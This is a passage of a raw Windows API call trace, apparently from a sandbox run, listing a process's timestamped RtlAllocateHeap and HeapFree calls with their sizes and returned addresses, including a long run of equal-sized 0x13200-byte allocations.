HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fe1a0 | out: hHeap=0x4e0000) returned 1 [0227.694] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8910 | out: hHeap=0x4e0000) returned 1 [0227.694] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x890) returned 0x52d940 [0227.694] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0227.694] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xac0) returned 0x52d940 [0227.694] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0227.694] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x20) returned 0x4eb350 [0227.694] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x960) returned 0x52d940 [0227.694] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x960) returned 0x52e2b0 [0227.694] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0227.694] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x460) returned 0x4f8910 [0227.694] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xe0f) returned 0x52ec20 [0227.694] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52e2b0 | out: hHeap=0x4e0000) returned 1 [0227.694] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8910 | out: hHeap=0x4e0000) returned 1 [0227.694] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1c17) returned 0x513730 [0227.694] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xe00) returned 0x52d940 [0227.695] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x700) returned 0x515350 [0227.695] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x513730 | out: hHeap=0x4e0000) returned 1 [0227.695] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0227.695] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x153d) returned 0x513730 [0227.695] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52ec20 | out: hHeap=0x4e0000) returned 1 [0227.695] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x515350 | out: hHeap=0x4e0000) returned 1 [0227.695] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x2277) returned 0x52d940 [0227.695] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1157) returned 0x514c80 [0227.695] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x8a0) returned 0x515de0 [0227.695] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0227.695] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x514c80 | out: hHeap=0x4e0000) returned 1 [0227.695] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1fc7) returned 0x52d940 [0227.695] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x513730 | out: hHeap=0x4e0000) returned 1 [0227.695] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x515de0 | out: hHeap=0x4e0000) returned 1 [0227.696] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1657) returned 0x513730 [0227.696] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xb20) returned 0x514d90 [0227.696] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x590) returned 0x52f910 [0227.696] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x513730 | out: hHeap=0x4e0000) returned 1 [0227.696] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x514d90 | out: hHeap=0x4e0000) returned 1 [0227.696] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x2f96) returned 0x513730 [0227.696] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0227.696] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52f910 | out: hHeap=0x4e0000) returned 1 [0227.696] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x2b47) returned 0x5166d0 [0227.696] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x15b7) returned 0x52d940 [0227.697] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xad0) returned 0x52ef00 [0227.697] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x5166d0 | out: hHeap=0x4e0000) returned 1 [0227.697] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0227.697] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52ef00 | out: hHeap=0x4e0000) returned 1 [0227.697] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x2697) returned 0x5166d0 [0227.697] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1367) returned 0x52d940 [0228.485] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x9a0) returned 0x52ecb0 [0228.485] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x5166d0 | out: hHeap=0x4e0000) returned 1 [0228.485] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0228.485] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x474d) returned 0x5166d0 [0228.485] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x513730 | out: hHeap=0x4e0000) returned 1 [0228.485] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52ecb0 | out: hHeap=0x4e0000) returned 1 [0228.485] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x920) returned 0x52d940 [0228.485] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0228.485] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1b47) returned 0x52d940 [0228.485] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xd90) returned 0x51ae30 [0228.486] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x6d0) returned 0x52f490 [0228.486] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0228.486] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x51ae30 | out: hHeap=0x4e0000) returned 1 [0228.486] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52f490 | out: hHeap=0x4e0000) returned 1 [0228.486] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x5d0) returned 0x4f8910 [0228.486] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x6adf) returned 0x4f93e0 [0228.486] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x5166d0 | out: hHeap=0x4e0000) returned 1 [0228.486] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8910 | out: hHeap=0x4e0000) returned 1 [0228.486] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1887) returned 0x52d940 [0228.486] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xc30) returned 0x52f1d0 [0228.487] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x620) returned 0x4f8910 [0228.487] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0228.487] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52f1d0 | out: hHeap=0x4e0000) returned 1 [0228.487] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8910 | out: hHeap=0x4e0000) returned 1 [0228.487] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x8f0) returned 0x52d940 [0228.487] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x480) returned 0x4f8910 [0228.487] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x240) returned 0x52e240 [0228.487] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0228.487] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8910 | out: hHeap=0x4e0000) returned 1 [0228.487] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52e240 | out: hHeap=0x4e0000) returned 1 [0228.487] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x40) returned 0x4f08b0 [0228.487] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb350 | out: hHeap=0x4e0000) returned 1 [0228.487] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50db40 | out: hHeap=0x4e0000) returned 1 [0228.488] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f93e0 | out: hHeap=0x4e0000) returned 1 [0228.488] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f08b0 | out: hHeap=0x4e0000) returned 1 [0228.488] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x9900) returned 0x4f93e0 [0228.489] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1bf0) returned 0x52d940 [0228.491] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0228.491] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x9937) returned 0x50db40 [0228.501] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f93e0 | out: hHeap=0x4e0000) returned 1 [0228.501] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x20) returned 0x4eb350 [0228.501] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x9900) returned 0x4f93e0 [0228.501] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1bf0) returned 0x52d940 [0228.502] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0228.502] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x9937) returned 0x52d940 [0228.503] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f93e0 | out: hHeap=0x4e0000) returned 1 [0228.504] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x40) returned 0x4f0a40 [0228.504] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb350 | out: hHeap=0x4e0000) returned 1 [0228.504] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x503790 | out: hHeap=0x4e0000) returned 1 [0228.504] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x51da40 | out: hHeap=0x4e0000) returned 1 [0228.505] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f0b80 | out: hHeap=0x4e0000) returned 1 [0228.505] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x4f93e0 [0228.505] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x517480 [0228.505] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x8) returned 0x4e8d40 [0228.505] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x537280 [0228.506] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f9080 [0228.506] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e8d40 | out: hHeap=0x4e0000) returned 1 [0228.506] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x54a490 [0228.506] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x18) returned 0x4f9160 [0228.506] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f9080 | out: hHeap=0x4e0000) returned 1 [0228.506] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x55d6a0 [0228.507] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x20) returned 0x4eb350 [0228.507] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f9160 | out: hHeap=0x4e0000) returned 1 [0228.507] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x5708b0 [0228.507] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x30) returned 0x4f8310 [0228.507] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb350 | out: hHeap=0x4e0000) returned 1 [0228.508] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x583ac0 [0228.508] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x596cd0 [0228.509] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x48) returned 0x4f0e00 [0228.509] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8310 | out: hHeap=0x4e0000) returned 1 [0228.509] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x5a9ee0 [0228.509] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x5bd0f0 [0228.509] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1e00080 [0228.510] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x68) returned 0x4e8d40 [0228.510] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f0e00 | out: hHeap=0x4e0000) returned 1 [0228.510] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1e13290 [0228.511] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1e264a0 [0228.511] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1e396b0 [0228.512] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1e4c8c0 [0228.512] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x98) returned 0x4e4c50 [0228.512] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e8d40 | out: hHeap=0x4e0000) returned 1 [0228.512] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1e5fad0 [0228.512] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1e72ce0 [0228.513] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1e85ef0 [0228.513] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1e99100 [0228.514] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1eac310 [0228.514] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1ebf520 [0228.515] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xe0) returned 0x4e4880 [0228.515] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e4c50 | out: hHeap=0x4e0000) returned 1 [0228.515] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1ed2730 [0228.516] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1fd0080 [0228.517] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1fe3290 [0228.518] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x1ff64a0 [0228.519] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x20096b0 [0228.519] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x201c8c0 [0228.520] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x202fad0 [0228.521] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2042ce0 [0228.522] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2055ef0 [0228.522] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x150) returned 0x4eb0b0 [0228.522] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e4880 | out: hHeap=0x4e0000) returned 1 [0228.522] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2069100 [0228.523] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x207c310 [0228.523] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x208f520 [0228.524] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x20a2730 [0228.524] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x20b5940 [0228.525] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x20c8b50 [0228.525] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x20dbd60 [0228.526] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x20eef70 [0228.526] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2102180 [0228.527] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2115390 [0228.874] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x21285a0 [0228.875] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x213b7b0 [0228.876] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x214e9c0 [0228.876] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2161bd0 [0228.876] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1f8) returned 0x4f8910 [0228.876] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb0b0 | out: hHeap=0x4e0000) returned 1 [0228.876] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2174de0 [0228.877] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2187ff0 [0228.877] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x219b200 [0228.878] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x21ae410 [0228.878] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x21d0080 [0228.879] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x21e3290 [0228.880] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x21f64a0 [0228.881] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x22096b0 [0228.881] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x221c8c0 [0228.882] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x222fad0 [0228.882] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2242ce0 [0228.883] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2255ef0 [0228.883] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2269100 [0228.884] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x227c310 [0228.884] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x228f520 [0228.884] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x22a2730 [0228.885] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x22b5940 [0228.885] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x22c8b50 [0228.886] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x22dbd60 [0228.886] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x22eef70 [0228.887] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2302180 [0228.887] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x2f0) returned 0x4f8b10 [0228.887] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8910 | out: hHeap=0x4e0000) returned 1 [0228.887] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2315390 [0228.888] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x23285a0 [0228.889] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x233b7b0 [0228.889] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x234e9c0 [0228.890] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2361bd0 [0228.890] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2374de0 [0228.890] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2387ff0 [0228.891] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x239b200 [0228.891] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x23ae410 [0228.892] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x23c1620 [0228.892] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x23d4830 [0228.893] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x23e7a40 [0228.894] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x23fac50 [0228.894] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x240de60 [0228.894] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2421070 [0228.895] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2434280 [0228.895] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2447490 [0228.896] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x245a6a0 [0228.896] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x246d8b0 [0228.897] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2480ac0 [0228.897] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2493cd0 [0228.897] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x24a6ee0 [0228.898] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x24ba0f0 [0228.898] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x24cd300 [0228.898] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x24e0510 [0228.899] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x24f3720 [0228.899] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2506930 [0228.900] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2519b40 [0228.900] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x252cd50 [0228.900] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x253ff60 [0228.900] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2553170 [0228.901] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x468) returned 0x50c5f0 [0228.901] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8b10 | out: hHeap=0x4e0000) returned 1 [0228.901] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2566380 [0228.901] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2579590 [0228.902] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x258c7a0 [0228.902] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x259f9b0 [0228.902] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x25b2bc0 [0228.903] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x25d0080 [0228.904] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x25e3290 [0228.904] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x25f64a0 [0228.905] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x26096b0 [0228.905] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x261c8c0 [0228.905] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x262fad0 [0228.906] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2642ce0 [0228.907] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2655ef0 [0228.907] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2669100 [0228.907] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x267c310 [0228.908] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x268f520 [0228.908] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x26a2730 [0229.125] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x26b5940 [0229.125] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x26c8b50 [0229.126] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x26dbd60 [0229.126] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x26eef70 [0229.127] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2702180 [0229.127] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2715390 [0229.127] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x27285a0 [0229.128] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x273b7b0 [0229.128] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x274e9c0 [0229.128] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2761bd0 [0229.128] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2774de0 [0229.129] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2787ff0 [0229.129] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x279b200 [0229.130] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x27ae410 [0229.130] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x27c1620 [0229.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x27d4830 [0229.131] RtlAllocateHeap 